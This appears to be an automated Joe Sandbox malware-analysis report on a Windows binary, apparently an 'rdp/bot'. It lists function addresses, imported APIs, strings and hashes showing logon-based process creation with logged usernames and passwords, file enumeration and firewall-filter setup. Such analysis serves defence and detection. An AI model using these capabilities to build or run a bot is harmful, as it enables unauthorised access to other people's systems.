Opcode ID: 17849adbd24b951f4aeb0e148422a47da2da14e58c0ef747395e598f3a492db1
Instruction ID: 4a05fdafed7e73f30e254f738c5bf47c04118800ba140e6ff2ba3c3a9247edb0
Opcode Fuzzy Hash: 17849adbd24b951f4aeb0e148422a47da2da14e58c0ef747395e598f3a492db1
Instruction Fuzzy Hash: 7CF05E13B08A0381F973BE0BB9D07B992412F81765EC995378D5C0A7D1EE3DA883C624

Function 00007FF764CC4872 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF764CC4B30

Strings

fs_file_read, xrefs: 00007FF764CC4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF764CC4B6C

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: db1394cb5d040a0732b129c8b882a0ded0419c026b03aa289372004f6f859cb5
Instruction ID: a6267ff4d29a2a2f4cfaf063ff864935e7f83a5909f29d36a9c409f436961634
Opcode Fuzzy Hash: db1394cb5d040a0732b129c8b882a0ded0419c026b03aa289372004f6f859cb5
Instruction Fuzzy Hash: E4F05E13B08A0781F972BE0BB9D07B992412F81765EC995378D5C0A7D1EE3DA883C624

Function 00007FF764CC4868 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF764CC4B30

Strings

fs_file_read, xrefs: 00007FF764CC4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF764CC4B6C

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 15d988275bd6a77afbdd860917dce8ee6ec7a0012be1500b13c403767ccb94a5
Instruction ID: 425d62ac2a78b4f102df9f273988b8e795a1de69fbb95806e175e3d1e26f67f3
Opcode Fuzzy Hash: 15d988275bd6a77afbdd860917dce8ee6ec7a0012be1500b13c403767ccb94a5
Instruction Fuzzy Hash: F8F05E13B08A0381F972BE0BB9D07B992412F81765EC995378D5C0A7D1EE3DA883C624

Function 00007FF764CC4890 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF764CC4B30

Strings

fs_file_read, xrefs: 00007FF764CC4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF764CC4B6C

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 555a60bbb94d8f11b84c7586d42656cd9d74e5fddd554d03be3b7fe2876d5776
Instruction ID: a1ec64a3060b2f7715f7278177b47906e5361ecf9de66f769aa4b4d5858c0cf3
Opcode Fuzzy Hash: 555a60bbb94d8f11b84c7586d42656cd9d74e5fddd554d03be3b7fe2876d5776
Instruction Fuzzy Hash: EAF05E13B08A0381F972BE0BB9D07B9D2412F81765EC995378D5C0ABD1EE3DA883C624

Function 00007FF764CC4886 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF764CC4B30

Strings

fs_file_read, xrefs: 00007FF764CC4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF764CC4B6C

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 7d89000f18e3ae9476e553b0de7a4799fa8d7fb19bfebcc332b22eb6a145fdd9
Instruction ID: 368cca5a53d4d506b5b9a5e7d9fc27b524a65b927eadc9adf09a672daab8df07
Opcode Fuzzy Hash: 7d89000f18e3ae9476e553b0de7a4799fa8d7fb19bfebcc332b22eb6a145fdd9
Instruction Fuzzy Hash: 0DF05E13B08A03C1F972BE0BB9D07B992412F81765EC99537CD5C0A7D1EE3DA883C624

Function 00007FF764CC487C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF764CC4B30

Strings

fs_file_read, xrefs: 00007FF764CC4B65
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF764CC4B6C

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: dea5dcb61242e3e3a50e5aadecfd36630c6c5b2ccdb5808b774e88059a5fe563
Instruction ID: 2afabbb282ea2a9b0c1c72107c900aa32e6b6e194a0ca9386b7b663af36bb1bd
Opcode Fuzzy Hash: dea5dcb61242e3e3a50e5aadecfd36630c6c5b2ccdb5808b774e88059a5fe563
Instruction Fuzzy Hash: 52F05E13B08A0381F972BE0BB9D17B992412F81765EC995378D5C0B7D1EE3DA883C624

Non-executed Functions

Function 00007FF764CC292E Relevance: 56.4, APIs: 17, Strings: 15, Instructions: 435stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF764CC29C0
strcat.MSVCRT ref: 00007FF764CC2AFA
strlen.MSVCRT ref: 00007FF764CC2B10
strlen.MSVCRT ref: 00007FF764CC2B1B
strlen.MSVCRT ref: 00007FF764CC2B4F
strcat.MSVCRT ref: 00007FF764CC2B5F
strlen.MSVCRT ref: 00007FF764CC2B9D
strlen.MSVCRT ref: 00007FF764CC2BAA
strlen.MSVCRT ref: 00007FF764CC2BD3
strcat.MSVCRT ref: 00007FF764CC2BE5
LogonUserA.ADVAPI32 ref: 00007FF764CC2C55
GetLastError.KERNEL32 ref: 00007FF764CC2C63
CloseHandle.KERNEL32 ref: 00007FF764CC2F27

Strings

h, xrefs: 00007FF764CC30F6
(pi != NULL), xrefs: 00007FF764CC2A62
[I] (%s) -> CreateProcessAsUserA done(usr=%s,pwd=%s,cmd=%s,pid=%lu), xrefs: 00007FF764CC2F10
(app != NULL), xrefs: 00007FF764CC2A96
C:/Projects/rdp/bot/codebase/process.c, xrefs: 00007FF764CC2A5B, 00007FF764CC2A8F, 00007FF764CC2AC3
[I] (%s) -> Done(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,pid=%lu), xrefs: 00007FF764CC2F7F
(usr == NULL) || (pwd != NULL), xrefs: 00007FF764CC2ACA
process_create, xrefs: 00007FF764CC2A29, 00007FF764CC2A69, 00007FF764CC2A9D, 00007FF764CC2AD1, 00007FF764CC2C83, 00007FF764CC2E1C, 00007FF764CC2F09, 00007FF764CC2F78, 00007FF764CC30AC, 00007FF764CC319E
[E] (%s) -> Failed(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,err=%08x), xrefs: 00007FF764CC2A30
[E] (%s) -> CreateProcessA failed(cmd=%s,gle=%lu), xrefs: 00007FF764CC30B3
[I] (%s) -> CreateProcessA done(cmd=%s,pid=%lu), xrefs: 00007FF764CC31A5
[E] (%s) -> CreateProcessAsUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu), xrefs: 00007FF764CC2E23
[E] (%s) -> LogonUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu), xrefs: 00007FF764CC2C8A
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF764CC2A70, 00007FF764CC2AA4, 00007FF764CC2AD8
NULL, xrefs: 00007FF764CC31B6, 00007FF764CC31C2, 00007FF764CC31CE, 00007FF764CC31DA, 00007FF764CC31E6, 00007FF764CC31F2, 00007FF764CC31FE, 00007FF764CC320A, 00007FF764CC3216

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: strlen$strcat$CloseErrorHandleLastLogonUser
String ID: (app != NULL)$(pi != NULL)$(usr == NULL) || (pwd != NULL)$C:/Projects/rdp/bot/codebase/process.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateProcessA failed(cmd=%s,gle=%lu)$[E] (%s) -> CreateProcessAsUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[E] (%s) -> Failed(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,err=%08x)$[E] (%s) -> LogonUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[I] (%s) -> CreateProcessA done(cmd=%s,pid=%lu)$[I] (%s) -> CreateProcessAsUserA done(usr=%s,pwd=%s,cmd=%s,pid=%lu)$[I] (%s) -> Done(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,pid=%lu)$h$process_create
API String ID: 1842180197-3127737957
Opcode ID: b8c7f51abbbad00766b63b972ff7788646e44901063f1b871291e187ee365b8b
Instruction ID: a922217add82131f0a13fbd1e6544ab7bddd6c84e456b62fa8a0aca561662ad0
Opcode Fuzzy Hash: b8c7f51abbbad00766b63b972ff7788646e44901063f1b871291e187ee365b8b
Instruction Fuzzy Hash: A41249A1A0C686C1FA70AF07E4A03F9E290BF45784FD42137D94E46B94EF6CE645DB21

Function 00007FF764CC3DB3 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 159filestringCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNEL32 ref: 00007FF764CC3DF9
strcpy.MSVCRT ref: 00007FF764CC3E14
FindFirstFileA.KERNEL32 ref: 00007FF764CC3EE7
GetLastError.KERNEL32 ref: 00007FF764CC3F03
GetLastError.KERNEL32 ref: 00007FF764CC3F32
FindClose.KERNEL32 ref: 00007FF764CC3F50

Part of subcall function 00007FF764CC14E2: fwrite.MSVCRT ref: 00007FF764CC158E
Part of subcall function 00007FF764CC14E2: fflush.MSVCRT ref: 00007FF764CC159A

Strings

fs_dir_list, xrefs: 00007FF764CC3E50, 00007FF764CC3E88, 00007FF764CC3EC0, 00007FF764CC3F1D, 00007FF764CC3F61
(resume_handle != NULL), xrefs: 00007FF764CC3EB9
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF764CC3E57, 00007FF764CC3E8F, 00007FF764CC3EC7
(path != NULL), xrefs: 00007FF764CC3E49
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF764CC3E42, 00007FF764CC3E7A, 00007FF764CC3EB2
[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu), xrefs: 00007FF764CC3F24
(name != NULL), xrefs: 00007FF764CC3E81
[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu), xrefs: 00007FF764CC3F68

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
API String ID: 4253334766-1535167640
Opcode ID: a56abdfbbd7eef0c8c2723d51d9ce088a74a472429bd005defaa61a22b691652
Instruction ID: 2b5b769c4c8ee0d25c7004bf6d10caaf5ccbc9bf367f6c5aac35627038ed233a
Opcode Fuzzy Hash: a56abdfbbd7eef0c8c2723d51d9ce088a74a472429bd005defaa61a22b691652
Instruction Fuzzy Hash: D1610A21E0C553C5FA70BF1AA8D03B8E2606F04394FD46573E85E4BBE1EE6CA845DB61

Function 00007FF764CC1A19 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 103COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32 ref: 00007FF764CC1A46
LoadResource.KERNEL32 ref: 00007FF764CC1A5E

Part of subcall function 00007FF764CC14E2: fwrite.MSVCRT ref: 00007FF764CC158E
Part of subcall function 00007FF764CC14E2: fflush.MSVCRT ref: 00007FF764CC159A

GetLastError.KERNEL32 ref: 00007FF764CC1B58
GetLastError.KERNEL32 ref: 00007FF764CC1B8D
GetLastError.KERNEL32 ref: 00007FF764CC1B92

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF764CC1B1F, 00007FF764CC1B4A
[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat, xrefs: 00007FF764CC1AE6
(hnd != NULL), xrefs: 00007FF764CC1B11
[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu), xrefs: 00007FF764CC1B6D
module_get_version, xrefs: 00007FF764CC1ADF, 00007FF764CC1B18, 00007FF764CC1B43, 00007FF764CC1B66, 00007FF764CC1B9B
C:/Projects/rdp/bot/codebase/module.c, xrefs: 00007FF764CC1B0A, 00007FF764CC1B35
[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu), xrefs: 00007FF764CC1BA2
(out != NULL), xrefs: 00007FF764CC1B3C

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: ErrorLast$Resource$FindLoadfflushfwrite
String ID: (hnd != NULL)$(out != NULL)$C:/Projects/rdp/bot/codebase/module.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu)$[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu)$[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat$module_get_version
API String ID: 2123903355-2019010457
Opcode ID: c66d0d2bf253c604d24e2eb69896048914559301695e6f6c54962ba82c94988b
Instruction ID: a7c0f6cc182022f63b0058b12163d16718ef65df9dc6924879b3cc360810b226
Opcode Fuzzy Hash: c66d0d2bf253c604d24e2eb69896048914559301695e6f6c54962ba82c94988b
Instruction Fuzzy Hash: C9412275608242CADB60EF6AE4905A9BBE0FB08754F905237EA5C83794EF3CE545CF10

Function 00007FF764CCFF1F Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF764CCFF2E
GetProcAddress.KERNEL32 ref: 00007FF764CCFF45
LoadLibraryW.KERNEL32 ref: 00007FF764CCFF53
GetProcAddress.KERNEL32 ref: 00007FF764CCFF63

Strings

rand_s, xrefs: 00007FF764CCFF3B
msvcrt.dll, xrefs: 00007FF764CCFF27
advapi32.dll, xrefs: 00007FF764CCFF4C
SystemFunction036, xrefs: 00007FF764CCFF59

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
API String ID: 384173800-4041758303
Opcode ID: 85c771fb55e45746b373319f0909d9bbab80cd8ba9edf7ac40692cd287980bbc
Instruction ID: 9b08b8050728ceb7a1ef00843bf1562772c16b402668b25e0427148497a9c543
Opcode Fuzzy Hash: 85c771fb55e45746b373319f0909d9bbab80cd8ba9edf7ac40692cd287980bbc
Instruction Fuzzy Hash: E7F0BC24E4AA17D0EE05BF53FC800A4B3A4AF48785FC42137C80E02368EE6CA18AC720

Function 00007FF764CC929A Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 118COMMON

Download Yara Rule

APIs

inet_addr.WS2_32 ref: 00007FF764CC92B1
ntohl.WS2_32 ref: 00007FF764CC92B9

Part of subcall function 00007FF764CC14E2: fwrite.MSVCRT ref: 00007FF764CC158E
Part of subcall function 00007FF764CC14E2: fflush.MSVCRT ref: 00007FF764CC159A

Strings

setup_ip4_filt, xrefs: 00007FF764CC9360, 00007FF764CC951A
TL, xrefs: 00007FF764CC92D6
[E] (%s) -> FwpmFilterAdd0(IPv4) failed(filt_idx=%d,res=%08lx), xrefs: 00007FF764CC9521
[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx), xrefs: 00007FF764CC9367
3L, xrefs: 00007FF764CC9486

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: fflushfwriteinet_addrntohl
String ID: 3L$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(filt_idx=%d,res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$setup_ip4_filt
API String ID: 3255839625-58178811
Opcode ID: 2033ac20ea33cc83e05537168d4012634626b8ec9451510fe05e8a1f1312e20c
Instruction ID: 9a84a55d17951dded3daf14d957174ed1662671103cfbc28905cfdabdc80be35
Opcode Fuzzy Hash: 2033ac20ea33cc83e05537168d4012634626b8ec9451510fe05e8a1f1312e20c
Instruction Fuzzy Hash: 43518C3260CBC5C9E7319B29B4803DAB6A1EB95784F845129D6CC4BBA9EF3DC085CB50

Function 00007FF764CC6FD5 Relevance: 1.5, APIs: 1, Instructions: 25timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF764CC6FF0

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: Time$FileSystem
String ID:
API String ID: 2086374402-0
Opcode ID: eaf35cacb86d4e2f88e6fced642b51b1d7c27793e30891e7df17b252400794d8
Instruction ID: 2a2b82302480748ddebdcd70e4ad0cbfb5dbef3ca29c5a415567da1a5763969e
Opcode Fuzzy Hash: eaf35cacb86d4e2f88e6fced642b51b1d7c27793e30891e7df17b252400794d8
Instruction Fuzzy Hash: 65E092A6728D4583EF30DA1AE0807BBA791D79C794F946034E95DC3BA4EA2CD952CB40

Function 00007FF764CDB6A0 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b903c808809adb16dfa016090dfacf5a5f100b12dc606a88c025edecc6fee081
Instruction ID: 7246a1900f3a227d60006a9419afb491dd6fbf0193ee8755f40d1925b99d8c3b
Opcode Fuzzy Hash: b903c808809adb16dfa016090dfacf5a5f100b12dc606a88c025edecc6fee081
Instruction Fuzzy Hash: 5431948BE5DAD1CAEB526D650CE91646FD1ABA2B217CE407FCA48077C3B84D1C16D331

Function 00007FF764CD05D9 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
